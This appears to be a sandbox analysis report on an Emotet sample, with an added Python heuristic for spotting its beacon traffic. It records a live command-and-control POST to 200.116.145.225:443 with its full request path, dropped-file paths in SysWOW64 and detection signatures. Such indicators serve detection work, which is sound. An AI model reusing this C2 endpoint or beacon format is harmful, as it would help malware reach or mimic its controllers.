96-B100171CD4B1","XboxCrossGenSetId":null,"XboxConsoleGenOptimized":null,"XboxConsoleGenCompatible":null},"AlternateIds":[{"IdType":"LegacyWindowsStoreProductId","Value":"8cb666bc-49d3-4722-bb14-5643aee3a729"},{"IdType":"LegacyWindowsPhoneProductId","Value":"94ad5279-e84a-4d40-b7cf-c6f16f916e6c"},{"IdType":"XboxTitleId","Value":"2124184622"}],"IngestionSourc
Source: svchost.exe, 00000006.00000003.753653199.0000027873F79000.00000004.00000001.sdmp String found in binary or memory: % Regular free updates with loads of new content\r\n____________________________ \r\n\r\nGame available in: English, French, Italian, German, Spanish, Portuguese, Brazilian Portuguese, Russian, Korean, Simplified Chinese, Traditional Chinese, Japanese, Arabic\r\n____________________________ \r\n\r\nSign up now for a weekly round-up of the best from G5 Games! www.g5e.com/e-mail\r\n____________________________ \r\n\r\nG5 Games - World of Adventures"!!\r\nCollect them all! Search for \"g5\" in Windows Store! \r\n____________________________\r\n\r\nVISIT US: www.g5e.com\r\nWATCH US: www.youtube.com/g5enter\r\nFIND US: www.facebook.com/HiddenCityGame\r\nJOIN US: https://instagram.com/hiddencity_\r\nFOLLOW US: www.twitter.com/g5games\r\nTerms of Service: http://www.g5e.com/termsofservice \r\nG5 End User License Supplemental Terms: http://www.g5e.com/G5_End_User_License_Supplemental_Terms","ProductTitle":"Hidden City: Hidden Object Adventure","SearchTitles":[{"SearchTitleString":"find hidden objects ","SearchTitleType":"SearchHint"},{"SearchTitleString":"junes pearls free ","SearchTitleType":"SearchHint"},{"SearchTitleString":"ispy notes peril","SearchTitleType":"SearchHint"},{"SearchTitleString":"seekers mystery ","SearchTitleType":"SearchHint"},{"SearchTitleString":"detective manor solving","SearchTitleType":"SearchHint"},{"SearchTitleString":"sherlock hotel spot it","SearchTitleType":"SearchHint"},{"SearchTitleString":"puzzle game journey 
","SearchTitleType":"SearchHint"}],"Language":"en","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductGame;1","ProductId":"9NBLGGH6J6VK","Properties":{"PackageFamilyName":"828B5831.HiddenCityMysteryofShadows_ytsefhwckbdv6","PackageIdentityName
Source: svchost.exe, 00000006.00000003.758933962.0000027873F2A000.00000004.00000001.sdmp String found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","ProductTitle":"Spotify Music","SearchTitles":[{"SearchTitleString":"Spotify","SearchTitleType":"SearchHint"},{"SearchTitleString":"Music","SearchTitleType":"SearchHint"},{"SearchTitleString":"music apps","SearchTitleType":"SearchHint"},{"SearchTitleString":"free music","SearchTitleType":"SearchHint"},{"SearchTitleString":"pandora","SearchTitleType":"SearchHint"},{"SearchTitleString":"streaming","SearchTitleType":"SearchHint"},{"SearchTitleString":"soundcloud","SearchTitleType":"SearchHint"}],"Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI", equals www.facebook.com (Facebook)
Source: svchost.exe, 00000006.00000003.758933962.0000027873F2A000.00000004.00000001.sdmp String found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","ProductTitle":"Spotify Music","SearchTitles":[{"SearchTitleString":"Spotify","SearchTitleType":"SearchHint"},{"SearchTitleString":"Music","SearchTitleType":"SearchHint"},{"SearchTitleString":"music apps","SearchTitleType":"SearchHint"},{"SearchTitleString":"free music","SearchTitleType":"SearchHint"},{"SearchTitleString":"pandora","SearchTitleType":"SearchHint"},{"SearchTitleString":"streaming","SearchTitleType":"SearchHint"},{"SearchTitleString":"soundcloud","SearchTitleType":"SearchHint"}],"Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI", equals www.twitter.com (Twitter)
Source: svchost.exe, 00000006.00000003.758933962.0000027873F2A000.00000004.00000001.sdmp String found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","ProductTitle":"Spotify Music","SearchTitles":[{"SearchTitleString":"Spotify","SearchTitleType":"SearchHint"},{"SearchTitleString":"Music","SearchTitleType":"SearchHint"},{"SearchTitleString":"music apps","SearchTitleType":"SearchHint"},{"SearchTitleString":"free music","SearchTitleType":"SearchHint"},{"SearchTitleString":"pandora","SearchTitleType":"SearchHint"},{"SearchTitleString":"streaming","SearchTitleType":"SearchHint"},{"SearchTitleString":"soundcloud","SearchTitleType":"SearchHint"}],"Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD",
"MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductUnifiedApp;3","ProductId":"9NCBCSZSJRSB","Properties":{"PackageFamilyName":"SpotifyAB.SpotifyMusic_zpdnekdrzrea0","PackageIdentityName":"SpotifyAB.SpotifyMusic","PublisherCertificateName":"CN=453637B3-4E12-4CDF-B0D3-2A3C863BF6EF","XboxCrossGenSetId":null,"XboxConsoleGenOptimized":null,"XboxConsoleGenCompatible":null},"AlternateIds":[{"IdType":"LegacyWindowsStoreProductId","Value":"ceac5d3f-8a4f-40e1-9a67-76d9108c7cb5"},{"IdType":"LegacyWindowsPhoneProductId","Value":"caac1b9d-621b-4f96-b143-e10e1397740a"},{"IdType":"XboxTitleId","Value":"1681279293"}],"IngestionSource":"DCE","IsMicrosoftProduct":false,"PreferredSkuId":"0010","ProductType":"Application","ValidationData":{"PassedValidation":false,"RevisionId":"2020-11-16T08:29:46.4904070Z||.||18ebec36-1675-40c0-a5d4-25e9e774360f||1152921505692410033||Null||fullrelease","ValidationResultUri":""},"MerchandizingTags":[],"PartD":"","ProductFamily":"Apps","ProductKind":"Application","DisplaySkuAvailabilities":[{"Sku"
Source: svchost.exe, 00000006.00000003.758971863.0000027873F66000.00000004.00000001.sdmp String found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","SkuTitle":"Spotify Music","Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI", equals www.facebook.com (Facebook)
Source: svchost.exe, 00000006.00000003.758971863.0000027873F66000.00000004.00000001.sdmp String found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","SkuTitle":"Spotify Music","Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI", equals www.twitter.com (Twitter)
Source: unknown HTTP traffic detected:
POST /0SatF/P7qctngEpv1Ya3fD3/jr1xjmE/NHdOxCQtbKORku0/xlzXExMFhF/ibPm1TBkGiQpYm/ HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
DNT: 1
Connection: keep-alive
Referer: 200.116.145.225/
Upgrade-Insecure-Requests: 1
Content-Type: multipart/form-data; boundary=---------hcIbcONok
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
Host: 200.116.145.225:443
Content-Length: 4628
Cache-Control: no-cache
Source: sort.exe, 00000001.00000002.932263156.0000000002AA3000.00000004.00000001.sdmp String found in binary or memory: http://200.116.145.225:443/0SatF/P7qctngEpv1Ya3fD3/jr1xjmE/NHdOxCQtbKORku0/xlzXExMFhF/ibPm1TBkGiQpYm
Source: svchost.exe, 00000006.00000002.770339069.00000278736D9000.00000004.00000001.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
Source: svchost.exe, 00000006.00000002.770339069.00000278736D9000.00000004.00000001.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
Source: svchost.exe, 00000006.00000002.770339069.00000278736D9000.00000004.00000001.sdmp String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
Source: svchost.exe, 00000006.00000002.770339069.00000278736D9000.00000004.00000001.sdmp String found in binary or memory: http://ocsp.digicert.com0
Source: svchost.exe, 00000006.00000003.758203492.0000027873F2A000.00000004.00000001.sdmp String found in binary or memory: http://universalstore.streaming.mediaservices.windows.net/411ee20d-d1b8-4d57-ae3f-af22235d79d9/1f8e1
Source: svchost.exe, 00000006.00000003.753653199.0000027873F79000.00000004.00000001.sdmp, svchost.exe, 00000006.00000003.753689942.0000027873F58000.00000004.00000001.sdmp String found in binary or memory: http://www.g5e.com/G5_End_User_License_Supplemental_Terms
Source: svchost.exe, 00000006.00000003.753653199.0000027873F79000.00000004.00000001.sdmp, svchost.exe, 00000006.00000003.753689942.0000027873F58000.00000004.00000001.sdmp String found in binary or memory: http://www.g5e.com/termsofservice
Source: svchost.exe, 00000006.00000003.752710199.0000027873F8F000.00000004.00000001.sdmp String found in binary or memory: http://www.hulu.com/privacy
Source: svchost.exe, 00000006.00000003.752710199.0000027873F8F000.00000004.00000001.sdmp String found in binary or memory: http://www.hulu.com/terms
Source: svchost.exe, 00000006.00000003.758203492.0000027873F2A000.00000004.00000001.sdmp, svchost.exe, 00000006.00000003.758104226.0000027873F6B000.00000004.00000001.sdmp String found in binary or memory: https://corp.roblox.com/contact/
Source: svchost.exe, 00000006.00000003.758203492.0000027873F2A000.00000004.00000001.sdmp, svchost.exe, 00000006.00000003.758104226.0000027873F6B000.00000004.00000001.sdmp, svchost.exe, 00000006.00000003.758139074.0000027873F62000.00000004.00000001.sdmp String found in binary or memory: https://corp.roblox.com/parents/
Source: svchost.exe, 00000006.00000003.758203492.0000027873F2A000.00000004.00000001.sdmp, svchost.exe, 00000006.00000003.758104226.0000027873F6B000.00000004.00000001.sdmp String found in binary or memory: https://en.help.roblox.com/hc/en-us
Source: svchost.exe, 00000006.00000003.753653199.0000027873F79000.00000004.00000001.sdmp, svchost.exe, 00000006.00000003.753689942.0000027873F58000.00000004.00000001.sdmp String found in binary or memory: https://instagram.com/hiddencity_
Source: sort.exe, 00000001.00000002.932252355.0000000002A7F000.00000004.00000001.sdmp String found in binary or memory: https://watson.telemet:443/0SatF/P7qctngEpv1Ya3fD3/jr1xjmE/NHdOxCQtbKORku0/xlzXExMFhF/ibPm1TBkGiQpYm
Source: svchost.exe, 00000006.00000003.752710199.0000027873F8F000.00000004.00000001.sdmp String found in binary or memory: https://www.hulu.com/ca-privacy-rights
Source: svchost.exe, 00000006.00000003.752710199.0000027873F8F000.00000004.00000001.sdmp String found in binary or memory: https://www.hulu.com/do-not-sell-my-info
Source: svchost.exe, 00000006.00000003.758203492.0000027873F2A000.00000004.00000001.sdmp, svchost.exe, 00000006.00000003.758104226.0000027873F6B000.00000004.00000001.sdmp String found in binary or memory: https://www.roblox.com/develop
Source: svchost.exe, 00000006.00000003.758203492.0000027873F2A000.00000004.00000001.sdmp, svchost.exe, 00000006.00000003.758104226.0000027873F6B000.00000004.00000001.sdmp String found in binary or memory: https://www.roblox.com/info/privacy
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49742
Source: unknown Network traffic detected: HTTP traffic on port 49742 -> 443
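The POST above is the only C2 exchange the report captures. The following Python is added to this report and is not part of the sandbox output: it parses that request (reconstructed here from the headers listed above; the 4628-byte multipart body is not in the report and is left empty) and scores the traits that make it recognisable as Emotet-style beaconing: a cleartext HTTP POST to a bare IP on port 443, a Referer equal to the Host, a path of random alphanumeric segments, a dash-padded multipart boundary and a legacy MSIE 7.0 User-Agent. The benign control request and the threshold of four traits are assumptions for illustration.

```python
"""Heuristic scoring of an HTTP request for Emotet-style C2 beaconing.

Added example for this report; not part of the sandbox output.
"""
import re
from dataclasses import dataclass
from typing import Dict, List

# Reconstructed from the headers listed in the report (constructed sample,
# not the raw capture). The 4628-byte multipart body is not in the report
# and is left empty here.
SAMPLE_REQUEST = (
    "POST /0SatF/P7qctngEpv1Ya3fD3/jr1xjmE/NHdOxCQtbKORku0/xlzXExMFhF/ibPm1TBkGiQpYm/ HTTP/1.1\r\n"
    "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\r\n"
    "Accept-Encoding: gzip, deflate\r\n"
    "DNT: 1\r\n"
    "Connection: keep-alive\r\n"
    "Referer: 200.116.145.225/\r\n"
    "Upgrade-Insecure-Requests: 1\r\n"
    "Content-Type: multipart/form-data; boundary=---------hcIbcONok\r\n"
    "User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; "
    ".NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)\r\n"
    "Host: 200.116.145.225:443\r\n"
    "Content-Length: 4628\r\n"
    "Cache-Control: no-cache\r\n"
    "\r\n"
)

# Assumed benign control request, for comparison only.
BENIGN_REQUEST = (
    "GET /index.html HTTP/1.1\r\n"
    "Host: www.example.com\r\n"
    "User-Agent: Mozilla/5.0\r\n"
    "\r\n"
)


@dataclass
class Request:
    method: str
    path: str
    headers: Dict[str, str]  # header names lower-cased


def parse_request(raw: str) -> Request:
    """Split a raw HTTP/1.1 request head into method, path and a header map."""
    head, _, _body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    method, path, _version = lines[0].split(" ", 2)
    headers: Dict[str, str] = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return Request(method, path, headers)


IPV4 = re.compile(r"^\d{1,3}(?:\.\d{1,3}){3}$")
# Three or more path segments of 4+ mixed alphanumerics, ending in a slash.
RANDOM_PATH = re.compile(r"^(?:/[A-Za-z0-9]{4,}){3,}/$")
# Boundary of the form ---------hcIbcONok: a run of dashes, then random letters.
DASHED_BOUNDARY = re.compile(r"boundary=-{6,}[A-Za-z0-9]{6,}$")


def emotet_c2_indicators(req: Request) -> List[str]:
    """Return the names of the traits matched; an empty list means nothing matched."""
    hits: List[str] = []
    hostname, _, port = req.headers.get("host", "").partition(":")
    if req.method == "POST" and IPV4.match(hostname):
        hits.append("post_to_bare_ip")
    if port == "443":
        # The request is plaintext HTTP yet targets the TLS port.
        hits.append("cleartext_http_on_443")
    referer = req.headers.get("referer", "")
    if referer and referer.rstrip("/") == hostname:
        hits.append("referer_equals_host")
    if RANDOM_PATH.match(req.path):
        hits.append("random_alnum_path")
    if DASHED_BOUNDARY.search(req.headers.get("content-type", "")):
        hits.append("dashed_multipart_boundary")
    if "MSIE 7.0" in req.headers.get("user-agent", ""):
        hits.append("legacy_msie7_ua")
    return hits


def is_suspected_emotet(raw: str, threshold: int = 4) -> bool:
    """Assumed threshold: four or more traits on one request is treated as a hit."""
    return len(emotet_c2_indicators(parse_request(raw))) >= threshold


if __name__ == "__main__":
    for name, raw in (("report POST", SAMPLE_REQUEST), ("benign GET", BENIGN_REQUEST)):
        print(name, emotet_c2_indicators(parse_request(raw)))
```

Run against the reconstructed request, all six traits fire; the control GET fires none. Any single trait (an MSIE 7.0 User-Agent, a POST to an IP) is common enough in enterprise traffic that the combination, not one header, is what should be alerted on.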

Key, Mouse, Clipboard, Microphone and Screen Capturing:

barindex
Creates a DirectInput object (often for capturing keystrokes)
Note: the evidence below has the form of an application-compatibility shim hook entry (HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx") found in the memory of the original sample; it names a DirectDraw, not a DirectInput, entry point and by itself shows no keystroke capture.
Source: 2ojdmC51As.exe, 00000000.00000002.667805094.000000000069A000.00000004.00000020.sdmp Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>
Potential key logger detected (key state polling based)
Note: the GetKeyState chains below sit in the sample's own image (0x0041xxxx to 0x0042xxxx, at identical addresses in the dropped copy sort.exe), i.e. in the GUI carrier whose version info names it EffectDemo.EXE. The Emotet payload, where the Yara matches, the Crypt* calls and the service-manipulation code are found, lives in the unpacked regions at 0x0223xxxx (process 0) and 0x0227xxxx (process 1). These hits are consistent with ordinary window-message handling in the carrier rather than keylogging by the payload.
Source: C:\Users\user\Desktop\2ojdmC51As.exe Code function: 0_2_00422473 GetKeyState,GetKeyState,GetKeyState,GetFocus,GetDesktopWindow,SendMessageA, 0_2_00422473
Source: C:\Users\user\Desktop\2ojdmC51As.exe Code function: 0_2_00422488 GetKeyState,GetKeyState,GetKeyState,GetFocus,GetDesktopWindow,SendMessageA,SendMessageA,GetParent, 0_2_00422488
Source: C:\Users\user\Desktop\2ojdmC51As.exe Code function: 0_2_0041580E GetKeyState,GetKeyState,GetKeyState,GetKeyState,SendMessageA, 0_2_0041580E
Source: C:\Users\user\Desktop\2ojdmC51As.exe Code function: 0_2_004238DC GetKeyState,GetKeyState,GetKeyState, 0_2_004238DC
Source: C:\Users\user\Desktop\2ojdmC51As.exe Code function: 0_2_0041E95F ScreenToClient,GetKeyState,GetKeyState,GetKeyState,KillTimer, 0_2_0041E95F
Source: C:\Users\user\Desktop\2ojdmC51As.exe Code function: 0_2_00412ABD GetKeyState,GetKeyState,GetKeyState,GetKeyState, 0_2_00412ABD
Source: C:\Users\user\Desktop\2ojdmC51As.exe Code function: 0_2_00410E05 __EH_prolog,GetKeyState,GetKeyState,GetKeyState,GetKeyState,GetParent,SendMessageA,SendMessageA,SendMessageA,ScreenToClient,GetCursorPos,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SetWindowPos,SendMessageA,SendMessageA,GetParent, 0_2_00410E05
Source: C:\Windows\SysWOW64\setupugc\sort.exe Code function: 1_2_00422473 GetKeyState,GetKeyState,GetKeyState,GetFocus,GetDesktopWindow,SendMessageA, 1_2_00422473
Source: C:\Windows\SysWOW64\setupugc\sort.exe Code function: 1_2_00422488 GetKeyState,GetKeyState,GetKeyState,GetFocus,GetDesktopWindow,SendMessageA,SendMessageA,GetParent, 1_2_00422488
Source: C:\Windows\SysWOW64\setupugc\sort.exe Code function: 1_2_0041580E GetKeyState,GetKeyState,GetKeyState,GetKeyState,SendMessageA, 1_2_0041580E
Source: C:\Windows\SysWOW64\setupugc\sort.exe Code function: 1_2_004238DC GetKeyState,GetKeyState,GetKeyState, 1_2_004238DC
Source: C:\Windows\SysWOW64\setupugc\sort.exe Code function: 1_2_0041E95F ScreenToClient,GetKeyState,GetKeyState,GetKeyState,KillTimer, 1_2_0041E95F
Source: C:\Windows\SysWOW64\setupugc\sort.exe Code function: 1_2_00412ABD GetKeyState,GetKeyState,GetKeyState,GetKeyState, 1_2_00412ABD
Source: C:\Windows\SysWOW64\setupugc\sort.exe Code function: 1_2_00410E05 __EH_prolog,GetKeyState,GetKeyState,GetKeyState,GetKeyState,GetParent,SendMessageA,SendMessageA,SendMessageA,ScreenToClient,GetCursorPos,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SetWindowPos,SendMessageA,SendMessageA,GetParent, 1_2_00410E05

E-Banking Fraud:

barindex
Yara detected Emotet
Source: Yara match File source: 00000001.00000002.931629655.0000000002220000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.667768852.0000000000664000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.931663752.0000000002244000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.667968476.0000000002231000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.931690638.0000000002271000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.667721626.0000000000620000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0.2.2ojdmC51As.exe.2230000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.sort.exe.2270000.1.unpack, type: UNPACKEDPE
Source: C:\Windows\SysWOW64\setupugc\sort.exe Code function: 1_2_02272650 CryptAcquireContextW,CryptGenKey,CryptCreateHash,CryptImportKey,LocalFree,CryptDecodeObjectEx,CryptDecodeObjectEx, 1_2_02272650

System Summary:

barindex
Creates files inside the system directory
Source: C:\Users\user\Desktop\2ojdmC51As.exe File created: C:\Windows\SysWOW64\setupugc\ Jump to behavior
Deletes files inside the Windows folder
Source: C:\Users\user\Desktop\2ojdmC51As.exe File deleted: C:\Windows\SysWOW64\setupugc\sort.exe:Zone.Identifier Jump to behavior
Detected potential crypto function
Source: C:\Users\user\Desktop\2ojdmC51As.exe Code function: 0_2_00408293 0_2_00408293
Source: C:\Users\user\Desktop\2ojdmC51As.exe Code function: 0_2_004145CA 0_2_004145CA
Source: C:\Users\user\Desktop\2ojdmC51As.exe Code function: 0_2_02238240 0_2_02238240
Source: C:\Users\user\Desktop\2ojdmC51As.exe Code function: 0_2_02237740 0_2_02237740
Source: C:\Users\user\Desktop\2ojdmC51As.exe Code function: 0_2_02236530 0_2_02236530
Source: C:\Users\user\Desktop\2ojdmC51As.exe Code function: 0_2_02233BA0 0_2_02233BA0
Source: C:\Users\user\Desktop\2ojdmC51As.exe Code function: 0_2_02233F20 0_2_02233F20
Source: C:\Users\user\Desktop\2ojdmC51As.exe Code function: 0_2_02231C70 0_2_02231C70
Source: C:\Users\user\Desktop\2ojdmC51As.exe Code function: 0_2_02233D10 0_2_02233D10
Source: C:\Windows\SysWOW64\setupugc\sort.exe Code function: 1_2_00408293 1_2_00408293
Source: C:\Windows\SysWOW64\setupugc\sort.exe Code function: 1_2_004145CA 1_2_004145CA
Source: C:\Windows\SysWOW64\setupugc\sort.exe Code function: 1_2_02278240 1_2_02278240
Source: C:\Windows\SysWOW64\setupugc\sort.exe Code function: 1_2_02277740 1_2_02277740
Source: C:\Windows\SysWOW64\setupugc\sort.exe Code function: 1_2_02276530 1_2_02276530
Source: C:\Windows\SysWOW64\setupugc\sort.exe Code function: 1_2_02273BA0 1_2_02273BA0
Source: C:\Windows\SysWOW64\setupugc\sort.exe Code function: 1_2_02273F20 1_2_02273F20
Source: C:\Windows\SysWOW64\setupugc\sort.exe Code function: 1_2_02271C70 1_2_02271C70
Source: C:\Windows\SysWOW64\setupugc\sort.exe Code function: 1_2_02273D10 1_2_02273D10
Source: C:\Windows\SysWOW64\setupugc\sort.exe Code function: 1_2_02225ABE 1_2_02225ABE
Source: C:\Windows\SysWOW64\setupugc\sort.exe Code function: 1_2_0223F2F9 1_2_0223F2F9
Source: C:\Windows\SysWOW64\setupugc\sort.exe Code function: 1_2_022292DE 1_2_022292DE
Source: C:\Windows\SysWOW64\setupugc\sort.exe Code function: 1_2_0222380E 1_2_0222380E
Source: C:\Windows\SysWOW64\setupugc\sort.exe Code function: 1_2_022258AE 1_2_022258AE
Source: C:\Windows\SysWOW64\setupugc\sort.exe Code function: 1_2_022280CE 1_2_022280CE
Source: C:\Windows\SysWOW64\setupugc\sort.exe Code function: 1_2_0222573E 1_2_0222573E
Source: C:\Windows\SysWOW64\setupugc\sort.exe Code function: 1_2_02229DDE 1_2_02229DDE
Found potential string decryption / allocating functions
Source: C:\Users\user\Desktop\2ojdmC51As.exe Code function: String function: 00406520 appears 174 times
Source: C:\Users\user\Desktop\2ojdmC51As.exe Code function: String function: 00405626 appears 49 times
Source: C:\Windows\SysWOW64\setupugc\sort.exe Code function: String function: 00406520 appears 168 times
Source: C:\Windows\SysWOW64\setupugc\sort.exe Code function: String function: 00405626 appears 44 times
PE file contains strange resources
Source: 2ojdmC51As.exe Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 2ojdmC51As.exe Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Sample file is different than original file name gathered from version info
Source: 2ojdmC51As.exe, 00000000.00000000.665451688.000000000043C000.00000002.00020000.sdmp Binary or memory string: OriginalFilenameEffectDemo.EXEN vs 2ojdmC51As.exe
